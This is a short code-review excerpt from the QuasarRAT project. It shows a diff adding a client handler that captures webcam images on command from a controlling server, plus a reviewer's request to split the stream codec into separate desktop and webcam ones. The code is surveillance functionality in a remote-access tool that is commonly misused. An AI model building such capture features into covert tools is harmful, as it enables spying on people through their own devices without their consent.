Client/Core/Commands/SurveillanceHandler.cs

```diff
@@ -97,6 +97,62 @@ public static void HandleGetDesktop(Packets.ServerPackets.GetDesktop command, Cl
             }
         }
 
+        public static void HandleGetWebcamImage(Packets.ServerPackets.GetWebcamImage command, Client client)
+        {
+            var resolution = "800x600";
+
+            if (StreamCodec == null)
+                StreamCodec = new UnsafeStreamCodec(command.Quality, command.Webcam, resolution);
+
+            if (StreamCodec.ImageQuality != command.Quality || StreamCodec.Monitor != command.Webcam
+                || StreamCodec.Resolution != resolution)
+            {
+                if (StreamCodec != null)
+                    StreamCodec.Dispose();
+
+                StreamCodec = new UnsafeStreamCodec(command.Quality, command.Webcam, resolution);
```

Comment:
Please seperate the StreamCodec into two, one `StreamCodecDesktop` and the other `StreamCodecWebcam`.
Don't forget to dispose the second [here](https://github.com/quasar/QuasarRAT/blob/master/Client/Program.cs#L44) too.